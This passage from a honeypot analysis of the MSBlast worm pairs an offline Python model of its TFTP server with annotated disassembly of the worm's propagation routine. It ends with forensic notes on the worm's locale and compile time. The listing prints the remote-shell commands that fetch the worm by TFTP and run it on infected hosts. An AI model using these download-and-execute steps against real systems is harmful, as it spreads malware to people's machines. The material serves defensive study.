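The TFTP exchange the server above takes part in, as an added Python example (not code from the worm or from the original analysis): RRQ parsing, the 512-byte DATA blocks the server answers with, and ACK parsing, wrapped in a server object that ignores the requested file name the way the listing does. Sockets are left out so it runs offline; the class and function names are this example's own. A client such as `tftp -i` requests mode octet; the example records the mode but, like the worm, does not act on it.

```python
import struct

RRQ, WRQ, DATA, ACK, ERROR = 1, 2, 3, 4, 5
BLOCK = 512               # largest data block; 4 + 512 = 516 is the recvfrom buffer size in the listing


def parse_request(pkt: bytes):
    """Decode an RRQ/WRQ (RFC 1350): opcode, NUL-terminated file name, NUL-terminated mode."""
    if len(pkt) < 4:
        raise ValueError("short TFTP packet")
    op = struct.unpack("!H", pkt[:2])[0]
    if op not in (RRQ, WRQ):
        raise ValueError("not a request, opcode %d" % op)
    fields = pkt[2:].split(b"\x00")
    if len(fields) < 3:   # name, mode, and the empty tail after the final NUL
        raise ValueError("request lacks file name or mode")
    return op, fields[0].decode("latin-1"), fields[1].decode("latin-1").lower()


def data_blocks(payload: bytes):
    """Split a file into DATA packets; a final block shorter than 512 bytes (possibly empty) ends the transfer."""
    n = 0
    for off in range(0, len(payload), BLOCK):
        n += 1
        yield struct.pack("!HH", DATA, n & 0xFFFF) + payload[off:off + BLOCK]
    if len(payload) % BLOCK == 0:
        yield struct.pack("!HH", DATA, (n + 1) & 0xFFFF)


def parse_ack(pkt: bytes) -> int:
    """Block number acknowledged by the client; a server sends block n+1 only after ACK n."""
    op, block = struct.unpack("!HH", pkt[:4])
    if op != ACK:
        raise ValueError("expected ACK, got opcode %d" % op)
    return block


class WormStyleTftpServer:
    """Serves one fixed file no matter which name is requested: the behaviour the listing shows,
    where fopen() is called on the worm's own path without looking at the request."""

    def __init__(self, served_file: bytes):
        self.served_file = served_file
        self.requested_names = []      # useful in a honeypot: what did the client ask for?

    def handle_request(self, pkt: bytes) -> list:
        """All DATA packets for a read request, or a single ERROR packet for anything else."""
        op, name, _mode = parse_request(pkt)
        self.requested_names.append(name)
        if op != RRQ:
            return [struct.pack("!HH", ERROR, 4) + b"Illegal TFTP operation\x00"]
        return list(data_blocks(self.served_file))
```

Handing the same byte string back for "msblast.exe" and for any other name is what makes the page's point testable: a request for a system file gets the worm, not the file.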
..................
; Create the TFTP server thread, then send commands over the remote shell to fetch and run the file
00401CBD 8D85CCE6FFFF       LEA EAX, DWORD PTR [EBP+FFFFE6CC]
00401CC3 50                 PUSH EAX                   ; lpThreadId
00401CC4 6A00               PUSH 00000000
00401CC6 6A00               PUSH 00000000
00401CC8 6876154000         PUSH 00401576              ; lpStartAddress: TFTP server function
00401CCD 6A00               PUSH 00000000
00401CCF 6A00               PUSH 00000000
00401CD1 E89E060000         CALL 00402374              ; KERNEL32.CreateThread
00401CD6 8985C0EDFFFF       MOV DWORD PTR [EBP+FFFFEDC0], EAX   ; TFTP thread handle
00401CDC 6A50               PUSH 00000050
00401CDE E879060000         CALL 0040235C              ; KERNEL32.Sleep 80 ms
00401CE3 683C404000         PUSH 0040403C              ; DB 'msblast.exe',0
00401CE8 6800304000         PUSH 00403000              ; global: this machine's IP as a string
00401CED 680C484000         PUSH 0040480C              ; DB 'tftp -i %s GET %s',0
00401CF2 8D85FCEDFFFF       LEA EAX, DWORD PTR [EBP+FFFFEDFC]
00401CF8 50                 PUSH EAX
00401CF9 E82A070000         CALL 00402428              ; CRTDLL.sprintf
00401CFE 83C410             ADD ESP, 00000010
00401D01 8D8DFCEDFFFF       LEA ECX, DWORD PTR [EBP+FFFFEDFC]
00401D07 83C8FF             OR EAX, FFFFFFFF
00401D0A 40                 INC EAX                    ; inline strlen of the command
00401D0B 803C0100           CMP BYTE PTR [ECX+EAX], 00
00401D0F 75F9               JNE 00401D0A
00401D11 6A00               PUSH 00000000              ; flags
00401D13 50                 PUSH EAX                   ; len
00401D14 8D85FCEDFFFF       LEA EAX, DWORD PTR [EBP+FFFFEDFC]
00401D1A 50                 PUSH EAX                   ; buf
00401D1B FFB5F8EDFFFF       PUSH DWORD PTR [EBP+FFFFEDF8]   ; socket connected to the remote shell
00401D21 E87A040000         CALL 004021A0              ; WS2_32.send
00401D26 83F801             CMP EAX, 00000001
00401D29 0F8CBC000000       JL 00401DEB                ; send failed: clean up
00401D2F 68E8030000         PUSH 000003E8
00401D34 E823060000         CALL 0040235C              ; KERNEL32.Sleep 1 s
00401D39 31DB               XOR EBX, EBX
00401D3B EB0B               JMP 00401D48
00401D3D 68D0070000         PUSH 000007D0
00401D42 E815060000         CALL 0040235C              ; KERNEL32.Sleep 2 s
00401D47 43                 INC EBX
00401D48 83FB0A             CMP EBX, 0000000A
00401D4B 7D09               JGE 00401D56               ; at most 10 rounds (20 s)
00401D4D 833D3840400000     CMP DWORD PTR [00404038], 00000000
00401D54 75E7               JNE 00401D3D               ; keep waiting while the global flag at 00404038 is set (transfer still in progress)
00401D56 683C404000         PUSH 0040403C              ; DB 'msblast.exe',0
00401D5B 6802484000         PUSH 00404802              ; DB 'start %s',0
00401D60 8D85FCEDFFFF       LEA EAX, DWORD PTR [EBP+FFFFEDFC]
00401D66 50                 PUSH EAX
00401D67 E8BC060000         CALL 00402428              ; CRTDLL.sprintf
00401D6C 83C40C             ADD ESP, 0000000C
00401D6F 8D8DFCEDFFFF       LEA ECX, DWORD PTR [EBP+FFFFEDFC]
00401D75 83C8FF             OR EAX, FFFFFFFF
00401D78 40                 INC EAX
00401D79 803C0100           CMP BYTE PTR [ECX+EAX], 00
00401D7D 75F9               JNE 00401D78
00401D7F 6A00               PUSH 00000000
00401D81 50                 PUSH EAX
00401D82 8D85FCEDFFFF       LEA EAX, DWORD PTR [EBP+FFFFEDFC]
00401D88 50                 PUSH EAX
00401D89 FFB5F8EDFFFF       PUSH DWORD PTR [EBP+FFFFEDF8]
00401D8F E80C040000         CALL 004021A0              ; WS2_32.send
00401D94 83F801             CMP EAX, 00000001
00401D97 7C52               JL 00401DEB
00401D99 68D0070000         PUSH 000007D0
00401D9E E8B9050000         CALL 0040235C              ; KERNEL32.Sleep 2 s
00401DA3 683C404000         PUSH 0040403C              ; DB 'msblast.exe',0
00401DA8 68FE474000         PUSH 004047FE              ; DB '%s',0
00401DAD 8D85FCEDFFFF       LEA EAX, DWORD PTR [EBP+FFFFEDFC]
00401DB3 50                 PUSH EAX
00401DB4 E86F060000         CALL 00402428              ; CRTDLL.sprintf
00401DB9 83C40C             ADD ESP, 0000000C
00401DBC 8D8DFCEDFFFF       LEA ECX, DWORD PTR [EBP+FFFFEDFC]
00401DC2 83C8FF             OR EAX, FFFFFFFF
00401DC5 40                 INC EAX
00401DC6 803C0100           CMP BYTE PTR [ECX+EAX], 00
00401DCA 75F9               JNE 00401DC5
00401DCC 6A00               PUSH 00000000
00401DCE 50                 PUSH EAX
00401DCF 8D85FCEDFFFF       LEA EAX, DWORD PTR [EBP+FFFFEDFC]
00401DD5 50                 PUSH EAX
00401DD6 FFB5F8EDFFFF       PUSH DWORD PTR [EBP+FFFFEDF8]
00401DDC E8BF030000         CALL 004021A0              ; WS2_32.send
00401DE1 68D0070000         PUSH 000007D0
00401DE6 E871050000         CALL 0040235C              ; KERNEL32.Sleep 2 s
00401DEB 83BDF8EDFFFF00     CMP DWORD PTR [EBP+FFFFEDF8], 00000000
00401DF2 740B               JE 00401DFF
00401DF4 FFB5F8EDFFFF       PUSH DWORD PTR [EBP+FFFFEDF8]
00401DFA E8F5030000         CALL 004021F4              ; WS2_32.closesocket: the shell connection
00401DFF 833D3840400000     CMP DWORD PTR [00404038], 00000000
00401E06 741F               JE 00401E27
00401E08 6A00               PUSH 00000000              ; dwExitCode
00401E0A FFB5C0EDFFFF       PUSH DWORD PTR [EBP+FFFFEDC0]   ; TFTP thread handle
00401E10 E853050000         CALL 00402368              ; KERNEL32.TerminateThread: stop the TFTP server
00401E15 FF3524314000       PUSH DWORD PTR [00403124]
00401E1B E8D4030000         CALL 004021F4              ; WS2_32.closesocket: the TFTP socket
00401E20 83253840400000     AND DWORD PTR [00404038], 00000000   ; clear the flag
00401E27 83BDC0EDFFFF00     CMP DWORD PTR [EBP+FFFFEDC0], 00000000
00401E2E 740B               JE 00401E3B
00401E30 FFB5C0EDFFFF       PUSH DWORD PTR [EBP+FFFFEDC0]
00401E36 E8F1040000         CALL 0040232C              ; KERNEL32.CloseHandle
00401E3B 5F                 POP EDI
00401E3C 5E                 POP ESI
00401E3D 5B                 POP EBX
00401E3E C9                 LEAVE
00401E3F C3                 RET
; After connecting to the remote shell, the worm sends these commands:
; tftp -i XXX.XXX.XXX.XXX GET msblast.exe
; start msblast.exe
; msblast.exe
I don't know why it runs msblast.exe twice.
The file fetched via TFTP is read-only.
From the Locale parameter of GetDateFormatA, 0x0409, the locale of the operating system the author used is English (United States).
The file's compile timestamp is 07:21 on August 11, 2003. The earliest capture on our honeypot was at 14:03 Beijing time on August 11, 2003.
If the author is in the same time zone as we are, the worm reached the honeypot about 6 hours after it was compiled; if not, the author's location should be no more than 6 time zones west of us.